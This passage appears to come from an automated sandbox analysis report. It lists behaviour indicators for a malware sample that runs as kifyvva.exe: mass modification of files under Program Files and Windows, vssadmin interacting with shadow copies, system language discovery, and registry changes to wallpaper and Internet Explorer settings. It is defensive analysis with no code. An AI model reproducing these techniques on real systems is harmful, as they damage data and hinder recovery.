| File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\6.png | C:\Users\Admin\AppData\Roaming\kifyvva.exe | N/A |
| File opened for modification | C:\Program Files\Google\Chrome\Application\106.0.5249.119\Locales\uk.pak | C:\Users\Admin\AppData\Roaming\kifyvva.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\SlideShow.Gadget\it-IT\css\settings.css | C:\Users\Admin\AppData\Roaming\kifyvva.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\CPU.Gadget\fr-FR\js\cpu.js | C:\Users\Admin\AppData\Roaming\kifyvva.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\Lime.css | C:\Users\Admin\AppData\Roaming\kifyvva.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\images\diner_m.png | C:\Users\Admin\AppData\Roaming\kifyvva.exe | N/A |
| File opened for modification | C:\Program Files\DVD Maker\Shared\DvdStyles\Full\dotsdarkoverlay.png | C:\Users\Admin\AppData\Roaming\kifyvva.exe | N/A |
| File opened for modification | C:\Program Files\DVD Maker\Shared\DvdStyles\Rectangles\NavigationUp_ButtonGraphic.png | C:\Users\Admin\AppData\Roaming\kifyvva.exe | N/A |
| File opened for modification | C:\Program Files\DVD Maker\Shared\DvdStyles\Travel\passport.png | C:\Users\Admin\AppData\Roaming\kifyvva.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.css.swt.theme.nl_zh_4.4.0.v20140623020002.jar | C:\Users\Admin\AppData\Roaming\kifyvva.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\Calendar.Gadget\images\month.png | C:\Users\Admin\AppData\Roaming\kifyvva.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\Currency.Gadget\images\combo-hover-left.png | C:\Users\Admin\AppData\Roaming\kifyvva.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\de-DE\js\picturePuzzle.js | C:\Users\Admin\AppData\Roaming\kifyvva.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\en-US\css\localizedSettings.css | C:\Users\Admin\AppData\Roaming\kifyvva.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\en-US\js\settings.js | C:\Users\Admin\AppData\Roaming\kifyvva.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\macTSFrame.png | C:\Users\Admin\AppData\Roaming\kifyvva.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\Currency.Gadget\images\base-undocked-3.png | C:\Users\Admin\AppData\Roaming\kifyvva.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\RSSFeeds.Gadget\it-IT\js\RSSFeeds.js | C:\Users\Admin\AppData\Roaming\kifyvva.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\Solutions\gradient.png | C:\Users\Admin\AppData\Roaming\kifyvva.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_black_hail.png | C:\Users\Admin\AppData\Roaming\kifyvva.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\Microsoft Shared\Stationery\Blue_Gradient.jpg | C:\Users\Admin\AppData\Roaming\kifyvva.exe | N/A |
| File opened for modification | C:\Program Files\DVD Maker\Shared\DvdStyles\Travel\passportcover.png | C:\Users\Admin\AppData\Roaming\kifyvva.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\it-IT\css\clock.css | C:\Users\Admin\AppData\Roaming\kifyvva.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\tile16.png | C:\Users\Admin\AppData\Roaming\kifyvva.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\Microsoft Shared\Stationery\Roses.jpg | C:\Users\Admin\AppData\Roaming\kifyvva.exe | N/A |
| File opened for modification | C:\Program Files\Google\Chrome\Application\106.0.5249.119\Locales\es-419.pak | C:\Users\Admin\AppData\Roaming\kifyvva.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\Maroon.css | C:\Users\Admin\AppData\Roaming\kifyvva.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\RSSFeeds.Gadget\images\flyoutBack.png | C:\Users\Admin\AppData\Roaming\kifyvva.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_black_moon-full_partly-cloudy.png | C:\Users\Admin\AppData\Roaming\kifyvva.exe | N/A |
| File opened for modification | C:\Program Files\DVD Maker\Shared\DvdStyles\Push\push.png | C:\Users\Admin\AppData\Roaming\kifyvva.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\en-US\js\weather.js | C:\Users\Admin\AppData\Roaming\kifyvva.exe | N/A |
| File opened for modification | C:\Program Files\DVD Maker\Shared\DvdStyles\ResizingPanels\203x8subpicture.png | C:\Users\Admin\AppData\Roaming\kifyvva.exe | N/A |
| File opened for modification | C:\Program Files\DVD Maker\Shared\DvdStyles\Sports\SportsMainToNotesBackground.wmv | C:\Users\Admin\AppData\Roaming\kifyvva.exe | N/A |
| File opened for modification | C:\Program Files\DVD Maker\Shared\DvdStyles\Sports\SportsScenesBackground_PAL.wmv | C:\Users\Admin\AppData\Roaming\kifyvva.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\icons\flight_recorder.png | C:\Users\Admin\AppData\Roaming\kifyvva.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\es-ES\css\settings.css | C:\Users\Admin\AppData\Roaming\kifyvva.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\Currency.Gadget\fr-FR\js\localizedStrings.js | C:\Users\Admin\AppData\Roaming\kifyvva.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\Calendar.Gadget\images\corner.png | C:\Users\Admin\AppData\Roaming\kifyvva.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\de-DE\css\clock.css | C:\Users\Admin\AppData\Roaming\kifyvva.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\de-DE\js\timeZones.js | C:\Users\Admin\AppData\Roaming\kifyvva.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\settings_corner_top_right.png | C:\Users\Admin\AppData\Roaming\kifyvva.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\diagnostics\system\Power\fr-FR\RS_ResetIdleSleepsetting.psd1 | C:\Users\Admin\AppData\Roaming\kifyvva.exe | N/A |
| File opened for modification | C:\Windows\winsxs\amd64_microsoft-windows-l..ultimaten.resources_31bf3856ad364e35_6.1.7601.17514_it-it_7a6c0813b0185bfc\license.rtf | C:\Users\Admin\AppData\Roaming\kifyvva.exe | N/A |
| File opened for modification | C:\Windows\winsxs\amd64_microsoft-windows-p..ll-preloc.resources_31bf3856ad364e35_6.1.7600.16385_it-it_aa520d2885499112\about_methods.help.txt | C:\Users\Admin\AppData\Roaming\kifyvva.exe | N/A |
| File opened for modification | C:\Windows\winsxs\amd64_microsoft-windows-wmpnss-service_31bf3856ad364e35_6.1.7601.17514_none_61acd141e5332baf\wmpnss_bw32.jpg | C:\Users\Admin\AppData\Roaming\kifyvva.exe | N/A |
| File opened for modification | C:\Windows\winsxs\amd64_microsoft-windows-gadgets-cpu_31bf3856ad364e35_6.1.7600.16385_none_a79a90daaf5bbeef\dialdot.png | C:\Users\Admin\AppData\Roaming\kifyvva.exe | N/A |
| File opened for modification | C:\Windows\winsxs\amd64_microsoft-windows-l..nterprise.resources_31bf3856ad364e35_6.1.7601.17514_de-de_cc67729ee12fc75e\license.rtf | C:\Users\Admin\AppData\Roaming\kifyvva.exe | N/A |
| File opened for modification | C:\Windows\winsxs\amd64_microsoft-windows-p..ll-preloc.resources_31bf3856ad364e35_6.1.7600.16385_de-de_74b66e05cc4097c8\about_Variables.help.txt | C:\Users\Admin\AppData\Roaming\kifyvva.exe | N/A |
| File opened for modification | C:\Windows\winsxs\amd64_microsoft-windows-l..essionale.resources_31bf3856ad364e35_6.1.7601.17514_it-it_02c858bf03c4047d\license.rtf | C:\Users\Admin\AppData\Roaming\kifyvva.exe | N/A |
| File opened for modification | C:\Windows\winsxs\amd64_microsoft-windows-p..ll-preloc.resources_31bf3856ad364e35_6.1.7600.16385_es-es_1d72a0e2bb459532\about_pipelines.help.txt | C:\Users\Admin\AppData\Roaming\kifyvva.exe | N/A |
| File opened for modification | C:\Windows\winsxs\wow64_microsoft-windows-p..ll-preloc.resources_31bf3856ad364e35_6.1.7600.16385_fr-fr_ca7ec133e2786d8f\about_join.help.txt | C:\Users\Admin\AppData\Roaming\kifyvva.exe | N/A |
| File opened for modification | C:\Windows\winsxs\x86_microsoft-windows-e..rtingcore.resources_31bf3856ad364e35_6.1.7600.16385_fr-fr_a56cb41c8b19254a\erofflps.txt | C:\Users\Admin\AppData\Roaming\kifyvva.exe | N/A |
| File opened for modification | C:\Windows\ehome\fr-FR\playReady_eula_oem.txt | C:\Users\Admin\AppData\Roaming\kifyvva.exe | N/A |
| File opened for modification | C:\Windows\winsxs\amd64_microsoft-windows-i..iagnostic.resources_31bf3856ad364e35_6.1.7601.17514_es-es_c820003a29e54552\RS_PhishingFilter.psd1 | C:\Users\Admin\AppData\Roaming\kifyvva.exe | N/A |
| File opened for modification | C:\Windows\winsxs\amd64_microsoft-windows-p..ll-preloc.resources_31bf3856ad364e35_6.1.7600.16385_es-es_1d72a0e2bb459532\about_logical_operators.help.txt | C:\Users\Admin\AppData\Roaming\kifyvva.exe | N/A |
| File opened for modification | C:\Windows\winsxs\wow64_microsoft-windows-p..ll-preloc.resources_31bf3856ad364e35_6.1.7600.16385_de-de_7f0b185800a159c3\about_WS-Management_Cmdlets.help.txt | C:\Users\Admin\AppData\Roaming\kifyvva.exe | N/A |
| File opened for modification | C:\Windows\winsxs\x86_microsoft-windows-l..essionaln.resources_31bf3856ad364e35_6.1.7600.16385_de-de_18379b6ee50e8ead\license.rtf | C:\Users\Admin\AppData\Roaming\kifyvva.exe | N/A |
| File opened for modification | C:\Windows\winsxs\amd64_microsoft-windows-l..essionale.resources_31bf3856ad364e35_6.1.7600.16385_ja-jp_789a038687e73e79\license.rtf | C:\Users\Admin\AppData\Roaming\kifyvva.exe | N/A |
| File opened for modification | C:\Windows\winsxs\amd64_microsoft-windows-p..ll-preloc.resources_31bf3856ad364e35_6.1.7600.16385_it-it_aa520d2885499112\about_join.help.txt | C:\Users\Admin\AppData\Roaming\kifyvva.exe | N/A |
| File opened for modification | C:\Windows\winsxs\amd64_microsoft-windows-l..ultimaten.resources_31bf3856ad364e35_6.1.7600.16385_es-es_8ff8d5f6972fa091\license.rtf | C:\Users\Admin\AppData\Roaming\kifyvva.exe | N/A |
| File opened for modification | C:\Windows\winsxs\wow64_microsoft-windows-p..ll-preloc.resources_31bf3856ad364e35_6.1.7600.16385_fr-fr_ca7ec133e2786d8f\about_remote_requirements.help.txt | C:\Users\Admin\AppData\Roaming\kifyvva.exe | N/A |
| File opened for modification | C:\Windows\winsxs\x86_microsoft-windows-g..zlegadget.resources_31bf3856ad364e35_6.1.7600.16385_ja-jp_d4f8a2f961a0e7e4\picturePuzzle.css | C:\Users\Admin\AppData\Roaming\kifyvva.exe | N/A |
| File opened for modification | C:\Windows\winsxs\x86_microsoft-windows-g..howgadget-insidebar_31bf3856ad364e35_6.1.7600.16385_none_a8d08d1343d8b261\slideshow_glass_frame.png | C:\Users\Admin\AppData\Roaming\kifyvva.exe | N/A |
| File opened for modification | C:\Windows\winsxs\x86_microsoft-windows-l..omebasicn.resources_31bf3856ad364e35_6.1.7600.16385_fr-fr_ab03602b9d6cb924\license.rtf | C:\Users\Admin\AppData\Roaming\kifyvva.exe | N/A |
| File opened for modification | C:\Windows\diagnostics\system\Performance\fr-FR\CL_LocalizationData.psd1 | C:\Users\Admin\AppData\Roaming\kifyvva.exe | N/A |
| File opened for modification | C:\Windows\Web\Wallpaper\Architecture\img17.jpg | C:\Users\Admin\AppData\Roaming\kifyvva.exe | N/A |
| File opened for modification | C:\Windows\winsxs\amd64_microsoft-windows-g..howgadget.resources_31bf3856ad364e35_6.1.7600.16385_es-es_c9675951dd42e377\slideShow.css | C:\Users\Admin\AppData\Roaming\kifyvva.exe | N/A |
| File opened for modification | C:\Windows\winsxs\amd64_microsoft-windows-i..iagnostic.resources_31bf3856ad364e35_6.1.7601.17514_de-de_a7b16680ef4ac882\RS_Resetpagesyncpolicy.psd1 | C:\Users\Admin\AppData\Roaming\kifyvva.exe | N/A |
| File opened for modification | C:\Windows\winsxs\amd64_microsoft-windows-p..ll-preloc.resources_31bf3856ad364e35_6.1.7600.16385_en-us_1da743febb1ea38d\about_Signing.help.txt | C:\Users\Admin\AppData\Roaming\kifyvva.exe | N/A |
| File opened for modification | C:\Windows\diagnostics\system\PCW\es-ES\CL_LocalizationData.psd1 | C:\Users\Admin\AppData\Roaming\kifyvva.exe | N/A |
| File opened for modification | C:\Windows\diagnostics\system\Power\en-US\RS_AdjustScreenBrightness.psd1 | C:\Users\Admin\AppData\Roaming\kifyvva.exe | N/A |
| File opened for modification | C:\Windows\winsxs\amd64_microsoft-windows-g..picturepuzzlegadget_31bf3856ad364e35_6.1.7600.16385_none_ce76f352fa54bd75\settings_box_divider_left.png | C:\Users\Admin\AppData\Roaming\kifyvva.exe | N/A |
| File opened for modification | C:\Windows\winsxs\Backup\amd64_microsoft-windows-f..itmap-ms_sans_serif_31bf3856ad364e35_6.1.7600.16385_none_ac9f9e10add68c8b_ssee874.fon_594d8854 | C:\Users\Admin\AppData\Roaming\kifyvva.exe | N/A |
| File opened for modification | C:\Windows\winsxs\x86_microsoft-windows-w..ar-wizard.resources_31bf3856ad364e35_6.1.7600.16385_it-it_708779e3dcd5055c\Add_a_device_or_computer_to_a_network_usb.rtf | C:\Users\Admin\AppData\Roaming\kifyvva.exe | N/A |
| File opened for modification | C:\Windows\winsxs\amd64_microsoft-windows-l..terprisen.resources_31bf3856ad364e35_6.1.7600.16385_ja-jp_906b5430848de670\license.rtf | C:\Users\Admin\AppData\Roaming\kifyvva.exe | N/A |
| File opened for modification | C:\Windows\winsxs\amd64_microsoft-windows-p..ll-preloc.resources_31bf3856ad364e35_6.1.7600.16385_ja-jp_4c778c357864a2ed\about_requires.help.txt | C:\Users\Admin\AppData\Roaming\kifyvva.exe | N/A |
| File opened for modification | C:\Windows\winsxs\amd64_microsoft-windows-s..iagnostic.resources_31bf3856ad364e35_6.1.7601.17514_fr-fr_83099b6ac05ef396\CL_LocalizationData.psd1 | C:\Users\Admin\AppData\Roaming\kifyvva.exe | N/A |
| File opened for modification | C:\Windows\winsxs\wow64_microsoft-windows-p..ll-preloc.resources_31bf3856ad364e35_6.1.7600.16385_en-us_27fbee50ef7f6588\about_data_sections.help.txt | C:\Users\Admin\AppData\Roaming\kifyvva.exe | N/A |
| File opened for modification | C:\Windows\winsxs\wow64_microsoft-windows-p..ll-preloc.resources_31bf3856ad364e35_6.1.7600.16385_ja-jp_56cc3687acc564e8\about_Session_Configurations.help.txt | C:\Users\Admin\AppData\Roaming\kifyvva.exe | N/A |
| File opened for modification | C:\Windows\diagnostics\system\Power\en-US\RS_ResetIdleDiskTimeout.psd1 | C:\Users\Admin\AppData\Roaming\kifyvva.exe | N/A |
| File opened for modification | C:\Windows\winsxs\amd64_microsoft-windows-w..coreinstrumentation_31bf3856ad364e35_6.1.7600.16385_none_519a5bdf88429b34\WpdCoreInstrumentation.ptxml | C:\Users\Admin\AppData\Roaming\kifyvva.exe | N/A |
| File opened for modification | C:\Windows\winsxs\wow64_microsoft-windows-p..ll-preloc.resources_31bf3856ad364e35_6.1.7600.16385_en-us_27fbee50ef7f6588\about_remote_troubleshooting.help.txt | C:\Users\Admin\AppData\Roaming\kifyvva.exe | N/A |
| File opened for modification | C:\Windows\winsxs\x86_microsoft-windows-l..-lpksetup.resources_31bf3856ad364e35_6.1.7601.17514_fr-fr_a1125f8395160405\lpeula.rtf | C:\Users\Admin\AppData\Roaming\kifyvva.exe | N/A |
| File opened for modification | C:\Windows\winsxs\amd64_microsoft-windows-gadgets-calendar_31bf3856ad364e35_6.1.7600.16385_none_6a1946701e0df451\calendar_double_bkg.png | C:\Users\Admin\AppData\Roaming\kifyvva.exe | N/A |
| File opened for modification | C:\Windows\winsxs\amd64_microsoft-windows-gadgets-clock_31bf3856ad364e35_6.1.7600.16385_none_3342e6899aa0557f\diner_dot.png | C:\Users\Admin\AppData\Roaming\kifyvva.exe | N/A |
| File opened for modification | C:\Windows\winsxs\amd64_microsoft-windows-gadgets-clock_31bf3856ad364e35_6.1.7600.16385_none_3342e6899aa0557f\trad_m.png | C:\Users\Admin\AppData\Roaming\kifyvva.exe | N/A |
| File opened for modification | C:\Windows\winsxs\amd64_microsoft-windows-o..disc-style-vignette_31bf3856ad364e35_6.1.7600.16385_none_cc1304de922cc585\NavigationRight_SelectionSubpicture.png | C:\Users\Admin\AppData\Roaming\kifyvva.exe | N/A |
| File opened for modification | C:\Windows\winsxs\wow64_microsoft-windows-p..ll-preloc.resources_31bf3856ad364e35_6.1.7600.16385_en-us_27fbee50ef7f6588\default.help.txt | C:\Users\Admin\AppData\Roaming\kifyvva.exe | N/A |
| File opened for modification | C:\Windows\winsxs\amd64_microsoft-windows-wmpnss-service_31bf3856ad364e35_6.1.7601.17514_none_61acd141e5332baf\wmpnss_color32.jpg | C:\Users\Admin\AppData\Roaming\kifyvva.exe | N/A |
| File opened for modification | C:\Windows\winsxs\Manifests\x86_microsoft-windows-r..sisengine.resources_31bf3856ad364e35_6.1.7600.16385_it-it_e21b444aa158f1f7.manifest | C:\Users\Admin\AppData\Roaming\kifyvva.exe | N/A |
| File opened for modification | C:\Windows\winsxs\x86_microsoft-windows-g..ets-slideshowgadget_31bf3856ad364e35_6.1.7600.16385_none_253e8c58002c48e1\play_hov.png | C:\Users\Admin\AppData\Roaming\kifyvva.exe | N/A |
| File opened for modification | C:\Windows\winsxs\x86_microsoft-windows-gadgets-cpu.resources_31bf3856ad364e35_6.1.7600.16385_de-de_a479cd0719d5814b\cpu.js | C:\Users\Admin\AppData\Roaming\kifyvva.exe | N/A |
| File opened for modification | C:\Windows\winsxs\x86_microsoft-windows-gadgets-rssfeedsgadget_31bf3856ad364e35_6.1.7600.16385_none_ab6782291b0ca7be\rss_headline_glow_floating.png | C:\Users\Admin\AppData\Roaming\kifyvva.exe | N/A |
| File opened for modification | C:\Windows\winsxs\amd64_microsoft-windows-l..ultimaten.resources_31bf3856ad364e35_6.1.7600.16385_de-de_e73ca319a82aa327\license.rtf | C:\Users\Admin\AppData\Roaming\kifyvva.exe | N/A |
| File opened for modification | C:\Windows\winsxs\amd64_microsoft-windows-l..mepremium.resources_31bf3856ad364e35_6.1.7601.17514_en-us_7cb9d6b0c095b208\license.rtf | C:\Users\Admin\AppData\Roaming\kifyvva.exe | N/A |
| File opened for modification | C:\Windows\winsxs\amd64_microsoft-windows-tabletpc-journal_31bf3856ad364e35_6.1.7601.17514_none_75d78dc0bb37c026\White_Chocolate.jpg | C:\Users\Admin\AppData\Roaming\kifyvva.exe | N/A |
| File opened for modification | C:\Windows\winsxs\amd64_microsoft-windows-gadgets-weather_31bf3856ad364e35_6.1.7600.16385_none_a9cf548d21b86a2f\docked_black_moon-last-quarter.png | C:\Users\Admin\AppData\Roaming\kifyvva.exe | N/A |
| File opened for modification | C:\Windows\winsxs\x86_microsoft-windows-g..-currency.resources_31bf3856ad364e35_6.1.7600.16385_de-de_2867d8179890f1a8\currency.css | C:\Users\Admin\AppData\Roaming\kifyvva.exe | N/A |
| File opened for modification | C:\Windows\winsxs\x86_microsoft-windows-l..essionaln.resources_31bf3856ad364e35_6.1.7600.16385_it-it_4dd33a919e1787f7\license.rtf | C:\Users\Admin\AppData\Roaming\kifyvva.exe | N/A |
| File opened for modification | C:\Windows\winsxs\x86_microsoft-windows-l..homebasic.resources_31bf3856ad364e35_6.1.7601.17514_it-it_cb41e15d1e0fe8c0\license.rtf | C:\Users\Admin\AppData\Roaming\kifyvva.exe | N/A |
| File opened for modification | C:\Windows\winsxs\x86_microsoft-windows-mail-app_31bf3856ad364e35_6.1.7601.17514_none_f35f9773adf74c06\Garden.jpg | C:\Users\Admin\AppData\Roaming\kifyvva.exe | N/A |
| File opened for modification | C:\Windows\winsxs\amd64_microsoft-windows-o..c-style-performance_31bf3856ad364e35_6.1.7600.16385_none_1d8aecb671a2bda5\redmenu.png | C:\Users\Admin\AppData\Roaming\kifyvva.exe | N/A |
| File opened for modification | C:\Windows\winsxs\wow64_microsoft-windows-p..ll-preloc.resources_31bf3856ad364e35_6.1.7600.16385_en-us_27fbee50ef7f6588\about_command_precedence.help.txt | C:\Users\Admin\AppData\Roaming\kifyvva.exe | N/A |
| File opened for modification | C:\Windows\winsxs\wow64_microsoft-windows-p..ll-preloc.resources_31bf3856ad364e35_6.1.7600.16385_en-us_27fbee50ef7f6588\about_Switch.help.txt | C:\Users\Admin\AppData\Roaming\kifyvva.exe | N/A |
| File opened for modification | C:\Windows\winsxs\wow64_microsoft-windows-p..ll-preloc.resources_31bf3856ad364e35_6.1.7600.16385_es-es_27c74b34efa6572d\about_Foreach.help.txt | C:\Users\Admin\AppData\Roaming\kifyvva.exe | N/A |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\vssadmin.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\kifyvva.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
Interacts with shadow copies
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\vssadmin.exe | N/A |
Modifies Control Panel
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Control Panel\Desktop\WallpaperStyle = "0" | C:\Users\Admin\AppData\Roaming\kifyvva.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Control Panel\Desktop\TileWallpaper = "0" | C:\Users\Admin\AppData\Roaming\kifyvva.exe | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\InternetRegistry | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\LowRegistry | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Zoom | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 90b9be135836db01 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\SearchScopes\DownloadRetries = "2" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\IntelliForms | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
